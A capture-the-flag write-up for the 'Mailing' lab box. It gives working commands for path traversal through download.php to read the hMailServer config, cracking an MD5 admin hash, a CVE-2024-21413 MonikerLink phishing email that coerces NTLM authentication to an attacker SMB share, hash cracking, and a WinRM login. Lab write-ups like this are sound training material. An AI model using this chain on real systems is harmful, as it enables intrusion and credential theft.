Mailing
A download endpoint reads arbitrary files, leaking the hMailServer admin MD5 hash; those mail credentials send a CVE-2024-21413 MonikerLink email that coerces a user's NetNTLMv2 hash, which cracks to a password for a WinRM shell and the user flag.
Overview
Mailing is an easy Windows box running hMailServer behind an IIS site. A download.php endpoint is vulnerable to path traversal, letting us read the hMailServer.ini config and recover the mail administrator’s password from an unsalted MD5 hash. With valid mail credentials we abuse CVE-2024-21413 (the Outlook/Windows Mail “MonikerLink” bug) to phish user maya into authenticating against our SMB server, capture her NetNTLMv2 hash, crack it, and log in over WinRM for the user flag. This post covers recon through the user flag.
Machine Matrix
Path-traversal config leak feeds a named CVE-2024-21413 MonikerLink NTLM-coercion phish; realistic mail-server chain where the public CVE is the central foothold mechanism.
Recon
1
nmap -p- --min-rate=1000 -sV 10.10.11.14
| Port | Service | Notes |
|---|---|---|
| 25/tcp | SMTP | hMailServer smtpd |
| 80/tcp | HTTP | Microsoft IIS httpd 10.0 |
| 110/tcp | POP3 | hMailServer pop3d |
| 143/tcp | IMAP | hMailServer imapd |
| 445/tcp | SMB | microsoft-ds |
| 465/587/993 | SMTPS/submission/IMAPS | hMailServer |
| 135, 139, 5985, 47001, 49664+ | RPC / WinRM | Windows |
The version banners make the theme obvious: this host is a mail server (hMailServer) with a web front end on IIS. Browsing port 80 redirects to mailing.htb, so add it to /etc/hosts:
1
echo "10.10.11.14 mailing.htb" | sudo tee -a /etc/hosts
The site advertises “Mailing - The ultimate mail server”, lists three team members (Ruy Alonso, Maya Bendito of the Support Team, Gregory Smith), and offers a Download Instructions button.
Enumeration
The instructions button issues a request to:
1
GET /download.php?file=instructions.pdf
The application reads the file parameter and returns the corresponding file from disk. If that value isn’t sanitized, ..\..\ sequences let us climb out of the intended directory — classic path traversal. Confirm it by reading a file that always exists on Windows:
1
curl -s "http://mailing.htb/download.php?file=../../Windows/System32/drivers/etc/hosts"
The response is the Windows HOSTS file, including the mailing.htb line — traversal confirmed.
Foothold
1 — Read the hMailServer config. hMailServer keeps its settings (including the admin password) in a config file at a well-known location: C:\Program Files (x86)\hMailServer\Bin\hMailServer.ini. Pull it through the same traversal primitive (spaces URL-encoded):
1
curl -s "http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/Bin/hMailServer.ini"
The [Security] section reveals the administrator password as an MD5 hash:
1
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
2 — Crack the hash. It’s an unsalted MD5, so it resolves instantly against a public lookup (CrackStation) or hashcat mode 0:
1
hashcat -a 0 -m 0 hash.txt /usr/share/wordlists/rockyou.txt
The plaintext is homenetworkingadministrator, giving us [email protected] mail credentials.
3 — Phish maya with CVE-2024-21413. Since the host runs Windows Mail, we abuse the MonikerLink bug: an email body containing a \\<attacker_ip>\share\file link causes the recipient’s mail client to silently authenticate to our SMB server over NTLM. Clone the PoC and start a capture server:
1
2
git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability.git
sudo impacket-smbserver smbFolder "$(pwd)" -smb2support
Send the malicious email from the admin account to maya (the Support Team member is a plausible reader):
1
2
3
4
python3 CVE-2024-21413.py --server mailing.htb --port 587 \
--username [email protected] --password 'homenetworkingadministrator' \
--sender [email protected] --recipient [email protected] \
--url "\\10.10.14.14\smbFolder\test.txt" --subject Test
Shortly after, the SMB server logs an incoming connection and prints maya’s NetNTLMv2 hash:
1
2
[*] AUTHENTICATE_MESSAGE (MAILING\maya,MAILING)
maya::MAILING:aaaaaaaaaaaaaaaa:60f6b238b0a3e2756d6d1e3599...
4 — Crack and log in. Save the hash and crack it with John:
1
john -w=/usr/share/wordlists/rockyou.txt hash.txt
It cracks to m4y4ngs4ri. Those credentials work over WinRM:
1
evil-winrm -u maya -p m4y4ngs4ri -i mailing.htb
User flag
1
type C:\Users\maya\Desktop\user.txt
1
[redacted]
Shell as mailing\maya and the user flag are ours.
Privilege escalation (LibreOffice CVE-2023-2255) is left as an exercise — this post stops at user.